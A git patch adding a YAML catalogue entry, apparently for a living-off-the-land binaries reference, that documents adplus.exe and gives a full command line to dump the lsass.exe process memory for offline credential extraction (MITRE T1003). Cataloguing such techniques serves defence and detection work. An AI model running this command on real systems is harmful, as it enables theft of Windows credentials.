From 080fe4ca5bf2a5dec5e70fb056ee2e9730dd17b1 Mon Sep 17 00:00:00 2001
From: ahmad <ahmad-alsabagh@Hotmail.com>
Date: Sat, 9 Jan 2021 02:56:32 -0500
Subject: [PATCH] Create Adplus.yml

---
 yml/OtherMSBinaries/Adplus.yml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Adplus.yml

diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml
new file mode 100644
index 0000000..9e35b3c
--- /dev/null
+++ b/yml/OtherMSBinaries/Adplus.yml
@@ -0,0 +1,27 @@
+---
+Name: adplus.exe
+Description: Debugging tool included with Windows Debugging Tools
+Author: mr.d0x
+Created: 1/9/2021
+Commands:
+  - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
+    Description: Creates a memory dump of the lsass process
+    Usecase: Create memory dump and parse it offline
+    Category: Credentials
+    Privileges: SYSTEM
+    MitreID: T1003
+    MitreLink: https://attack.mitre.org/techniques/T1003/
+    OperatingSystem: All Windows
+Full_Path:
+  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
+  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
+Code_Sample: 
+  - Code: 
+Detection: 
+  - IOC: 
+Resources:
+  - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
+Acknowledgement:
+  - Person: mr.d0x
+    Handle: '@mrd0x'
+---
\ No newline at end of file